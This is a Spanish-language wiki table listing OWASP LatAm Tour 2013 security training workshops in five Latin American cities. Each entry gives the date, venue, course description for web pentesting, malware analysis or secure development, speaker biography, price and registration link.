| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''COSTA RICA - SAN JOSE'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Lunes 18 de marzo de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | Fundación Omar Dengo - Barrio Francisco Peralta, Avenidas 10 y 12 - Calle 25 - San Jose &lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Rpulgar.JPG|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: Penetration Testing de Aplicaciones Web'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Las pruebas de intrusión a aplicaciones web son auditorías de seguridad en las que el penetration tester actúa como lo haría un posible atacante, pero con autorización; con el objetivo de analizar, encontrar y explotar vulnerabilidades de aplicaciones web corporativas.&lt;br /&gt;
El curso se basará en el OWASP Top 10 y en OWASP Testing Guide, como marcos de referencia para realizar todo el proceso de pentest de aplicaciones web.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
Ramiro Pulgar es Pentester e Investigador Forense de Blue Hat Consultores con mas de 12 años de experiencia en el campo de IT y seguridad informática, quien ha liderado y desarrollado proyectos en Ecuador y Colombia. También se ha desarrollado como instructor certificado EC-Council en varios países de Latinoamerica. Dentro de sus certificaciones se encuentra: LPT, CEI, CHFI, ECSA, CEH, ENSA, ECIH, RHCE, CCA, CCSE.&lt;br /&gt;
&lt;br /&gt;
Fundó el capítulo OWASP en Ecuador en el año 2010, y se ha desarrollado como líder y concientizador de OWASP, tanto a nivel comunitario, universitario, corporativo y gubernamental en Latinoamerica.&lt;br /&gt;
 &lt;br /&gt;
'''Prerequisitos:'''&lt;br /&gt;
&lt;br /&gt;
Una laptop con mínimo 4GB en RAM y 120GB de espacio en disco disponible.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13sjotraining HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''BOGOTA - COLOMBIA'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Miercoles 20 de Marzo de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | Universidad Javeriana. Edificio Fernando Barón Sala 2-309&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Pablo_ramos.PNG|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Análisis de malware: métodos y técnicas”'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.&lt;br /&gt;
 &lt;br /&gt;
El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.&lt;br /&gt;
&lt;br /&gt;
Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
  &lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13bogtrainingmalware HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Dragonjar.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller Practico De Seguridad Web'''&lt;br /&gt;
&lt;br /&gt;
'''Objetivo'''&lt;br /&gt;
&lt;br /&gt;
Obtener el conocimiento necesario para auditar la seguridad de las Aplicaciones web propias o de terceros, además de aprender a proteger y Solucionar estos fallos una vez encontrados.&lt;br /&gt;
&lt;br /&gt;
'''Descripción'''&lt;br /&gt;
&lt;br /&gt;
En este taller altamente practico descubriremos cuales son las Vulnerabilidades que encontramos mas a menudo en una aplicación web, Como explotar dichas vulnerabilidades y como asegurar nuestras Aplicaciones para evitar que estos dispositivos sean vulnerables a estos Fallos.&lt;br /&gt;
&lt;br /&gt;
'''Audiencia'''&lt;br /&gt;
&lt;br /&gt;
Estudiantes o profesionales del campo de la informática con deseos Aumentar sus conocimientos y aprender a evaluar la seguridad de las Aplicaciones web.&lt;br /&gt;
&lt;br /&gt;
'''Nivel:''' Medio&lt;br /&gt;
&lt;br /&gt;
'''Perfil del Orador:''' Jaime Andrés Restrepo Gomez&lt;br /&gt;
&lt;br /&gt;
Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales.&lt;br /&gt;
Consultor Independiente de Seguridad Informática con más de 6 años de experiencias en Ethical Hacking, Pen Testing y Análisis de Vulnerabilidades. Creador de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.&lt;br /&gt;
&lt;br /&gt;
Ha sido Speaker en diferentes eventos de Seguridad (EKO Party en Argentina, iSummit en Ecuador, Campus Party, Encuentro Internacional de Seguridad informÃ¡tica, Congreso de Hacking ético, SegurINFO, entre muchos otros) y miembro del Comité Organizador del Encuentro Internacional de Seguridad informática.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S300 No miembros / U$S250 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13bogtrainingpentest HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''CARACAS - VENEZUELA'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Sabado 23 de marzo de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | UCV - Universidad Central de Venezuela - Facultad de Ciencias - Salones de la Facultad&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Pablo_ramos.PNG|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Análisis de malware: métodos y técnicas”'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.&lt;br /&gt;
 &lt;br /&gt;
El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.&lt;br /&gt;
&lt;br /&gt;
Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:'''  Para No miembros 1250 Bs/200 UDS | Para Estudiantes y Miembros de Owasp 945 Bs/150 UDS &amp;lt;Br&amp;gt;. Existen también descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''NOTA IMPORTANTE''': El precio expresado en Bolívares es netamente referencial, el débito se cargara a su Tarjeta de Crédito en Dolares Americanos UDS, Es imprescindible utilizar la tarjeta asociada a su cupo CADIVI para realizar el pago.  &lt;br /&gt;
&lt;br /&gt;
  &lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13ccstrainingmalware HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Rubenrec.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “ Introducción al Pentest”'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Objetivo'''&lt;br /&gt;
&lt;br /&gt;
Curso de Introduccion a realización de Auditorías, orientado a todos los profesionales con conocimientos generales de Seguridad Informática que deseen introducirse en las metodologías de los tests de penetracion. Dirigido a: Profesionales con conocimientos generales de seguridad informática que deseen introducirse en las metodologías de realización de Tests de Intrusión &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Descripción'''&lt;br /&gt;
&lt;br /&gt;
En este taller altamente practico y se incluirán temas como:&lt;br /&gt;
&lt;br /&gt;
&amp;gt; Etapas en los Test de Penetración (Reconocimiento y enumeración, análisis y explotación)&lt;br /&gt;
&amp;gt; Pruebas de penetración a aplicaciones web&lt;br /&gt;
&amp;gt; Pruebas de penetración en redes locales&lt;br /&gt;
&amp;gt; Creación de exploits básicos y técnicas de explotación&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Audiencia'''&lt;br /&gt;
&lt;br /&gt;
Dirigido a: Estudiantes y Profesionales con conocimientos generales de seguridad informática que deseen introducirse en las metodologías de realización de Tests de penetración.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Nivel:''' Medio&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
Rubén Recabarren&lt;br /&gt;
&lt;br /&gt;
Egresado con honores de la Universidad de Michigan, Ann Arbor, con triple licenciatura en Biofísica, Bioquímica y Matemática Pura. Egresado también con honores de la Universidad Simón Bolívar como Ingeniero de la Computación. Adicionalmente, posee más de 10 certificaciones internacionales en diversas especialidades de la seguridad informática como manejo de incidentes, análisis forense y pruebas de penetración. &lt;br /&gt;
&lt;br /&gt;
Rubén Recabarren es una de las 3 únicas personas en el mundo en haber alcanzado las más altas certificaciones de seguridad informática: ISSAP y GSE que confieren dos de las organizaciones más importantes del área a nivel global: ISC2 y GIAC respectivamente. Actualmente trabaja como consultor de arquitectura de seguridad informática especializado en pruebas de penetración y criptografía, adicional a esto es Mentor local de SANS y escribe preguntas para los exámenes de certificación de la GIAC &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' Para No miembros 1250 Bs/200 UDS | Para Estudiantes y Miembros de Owasp 945 Bs/150 UDS  &amp;lt;Br&amp;gt;. Existen también descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''NOTA IMPORTANTE''': El precio expresado en Bolívares es netamente referencial, el débito se cargara a su Tarjeta de Crédito en Dolares Americanos UDS, Es imprescindible utilizar la tarjeta asociada a su cupo CADIVI para realizar el pago.&lt;br /&gt;
  &lt;br /&gt;
'''Para mayor información y registro''': [http://www.regonline.com/owasplatamtour13ccstrainingpentest HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''LIMA - PERU'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Lunes 25 de marzo de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | Escuela de Postgrado - Universidad Tecnológica del Perú (UTP). Av. Salaverry 2443 - San Isidro&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Pablo_ramos.PNG|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Análisis de malware: métodos y técnicas”'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.&lt;br /&gt;
 &lt;br /&gt;
El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.&lt;br /&gt;
&lt;br /&gt;
Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
  &lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13limtrainingmalware HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Dragonjar.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller Practico De Seguridad Web'''&lt;br /&gt;
&lt;br /&gt;
'''Objetivo'''&lt;br /&gt;
&lt;br /&gt;
Obtener el conocimiento necesario para auditar la seguridad de las Aplicaciones web propias o de terceros, además de aprender a proteger y Solucionar estos fallos una vez encontrados.&lt;br /&gt;
&lt;br /&gt;
'''Descripción'''&lt;br /&gt;
&lt;br /&gt;
En este taller altamente practico descubriremos cuales son las Vulnerabilidades que encontramos mas a menudo en una aplicación web, Como explotar dichas vulnerabilidades y como asegurar nuestras Aplicaciones para evitar que estos dispositivos sean vulnerables a estos Fallos.&lt;br /&gt;
&lt;br /&gt;
'''Audiencia'''&lt;br /&gt;
&lt;br /&gt;
Estudiantes o profesionales del campo de la informática con deseos Aumentar sus conocimientos y aprender a evaluar la seguridad de las Aplicaciones web.&lt;br /&gt;
&lt;br /&gt;
'''Nivel:''' Medio&lt;br /&gt;
&lt;br /&gt;
'''Perfil del Orador:''' Jaime Andrés Restrepo Gomez&lt;br /&gt;
&lt;br /&gt;
Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales.&lt;br /&gt;
Consultor Independiente de Seguridad Informática con más de 6 años de experiencias en Ethical Hacking, Pen Testing y Análisis de Vulnerabilidades. Creador de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.&lt;br /&gt;
&lt;br /&gt;
Ha sido Speaker en diferentes eventos de Seguridad (EKO Party en Argentina, iSummit en Ecuador, Campus Party, Encuentro Internacional de Seguridad informÃ¡tica, Congreso de Hacking ético, SegurINFO, entre muchos otros) y miembro del Comité Organizador del Encuentro Internacional de Seguridad informática.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13limtrainingpentest HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Cerullof.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: Desarrollo Seguro usando OWASP ESAPI'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Este curso tiene como objetivo proporcionar los conocimientos y recursos necesarios para mejorar la seguridad de las aplicaciones Java utilizando las librerias OWASP Enterprise Security API (ESAPI). Estas librerias se han diseñado para que sea más fácil para los desarrolladores mejorar la seguridad en aplicaciones existentes, como asi tambien utilizarlas como base para el desarrollo de nuevas aplicaciones. Los principios generales aprendidos en el curso se puede aplicar en el contexto de otros lenguajes de programación.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Fabio Cerullo, CEO y fundador de Cycubix, ayuda a clientes de todo el mundo a mejorar la seguridad de aplicaciones desarrolladas internamente o por terceros, mediante la definición de políticas y normas, implementando iniciativas de desarrollo seguro y gestión de riesgos, así como brindando capacitación sobre el tema a desarrolladores, auditores, ejecutivos y profesionales.&amp;lt;br&amp;gt;&lt;br /&gt;
Como miembro de la Fundación OWASP, Fabio se encarga de coordinar actividades globales de concientizacion sobre seguridad de aplicaciones con empresas privadas, gobiernos e instituciones educativas.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
&lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/latamtour13limtrainingesapi HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background: #4B0082;&amp;quot; colspan=&amp;quot;2&amp;quot; | &amp;lt;span style=&amp;quot;color:#ffffff&amp;quot;&amp;gt;'''QUITO - ECUADOR'''&amp;lt;/span&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Fecha''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;center&amp;quot; | Miercoles 27 de marzo de 2013&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#dbdbf3&amp;quot; align=&amp;quot;left&amp;quot; | UTPL - Universidad Tecnica Particular de Loja - Sede Quito | Av. 6 de Diciembre Nº 31-47 y Alpallana&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Pablo_ramos.PNG|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: “Análisis de malware: métodos y técnicas”'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;Pocos usuarios pueden jactarse de no haberse infectado jamás con un código malicioso. Es aún menos probable, que la mayoría de las empresas puedan afirmar que nunca sufrieron una infección de un virus, gusano o troyano en su red. El malware no ha dejado de ser, a pesar de su antigüedad, la amenaza masiva que más afecta a usuarios y empresas de todo el mundo. Conocer en profundidad su funcionamiento es una forma de comprender por qué el malware posee tanta efectividad y, a la vez, permite pensar en medidas de protección, prevención y mitigación ante las infecciones tanto en entornos personales, como en redes corporativas.&lt;br /&gt;
 &lt;br /&gt;
El equipo de Educación e Investigación de ESET Latinoamérica ofrece este curso donde se compartirán las herramientas, las técnicas y las metodologías para el análisis de malware, enfocados principalmente en metodologías de análisis dinámico de códigos maliciosos, ejecutando la amenaza y utilizando distintas herramientas para identificar cuál es el comportamiento de la amenaza en un sistema. Aunque se dictarán las bases conceptuales, el curso es mayormente práctico. Los asistentes podrán “jugar” en entornos controlados con los códigos maliciosos, y así poner en práctica sus conocimientos.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Pablo Ramos se desempeña actualmente como Security Researcher para ESET Latinoamérica, empresa dedicada al desarrollo, investigación y comercialización de soluciones de protección antivirus y seguridad informática.&lt;br /&gt;
&lt;br /&gt;
Antes de su ingreso a ESET Latinoamérica, Ramos se desempeñó como Consultor Técnico en Barcelona04/Computing Group en donde tuvo la posibilidad de incrementar sus conocimientos sobre distintas plataformas y bases de datos.&lt;br /&gt;
&lt;br /&gt;
'''Duracion:''' 8 horas&lt;br /&gt;
&lt;br /&gt;
'''Precio:''' U$S200 No miembros / U$S150 Miembros OWASP. Existen tambien descuentos para grupos.&lt;br /&gt;
  &lt;br /&gt;
'''Para mayor informacion y registro''': [http://www.regonline.com/owasplatamtour13uiotrainingmalware HAGA CLIC AQUI!]'''&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | [[Image:Cerullof.jpg|150px]]&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | '''Taller: Desarrollo Seguro usando OWASP ESAPI'''&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Este curso tiene como objetivo proporcionar los conocimientos y recursos necesarios para mejorar la seguridad de las aplicaciones Java utilizando las librerias OWASP Enterprise Security API (ESAPI). Estas librerias se han diseñado para que sea más fácil para los desarrolladores mejorar la seguridad en aplicaciones existentes, como asi tambien utilizarlas como base para el desarrollo de nuevas aplicaciones. Los principios generales aprendidos en el curso se puede aplicar en el contexto de otros lenguajes de programación.&lt;br /&gt;
&lt;br /&gt;
'''Perﬁl del orador'''&lt;br /&gt;
&lt;br /&gt;
Fabio Cerullo, CEO y fundador de Cycubix, ayuda a clientes de todo el mundo a mejorar la seguridad de aplicaciones desarrolladas internamente o por terceros, mediante la definición de políticas y normas, implementando iniciativas de desarrollo seguro y gestión de riesgos, así como brindando capacitación sobre el tema a desarrolladores, auditores, ejecutivos y profesionales.&amp;lt;br&amp;gt;&lt;br /&gt;
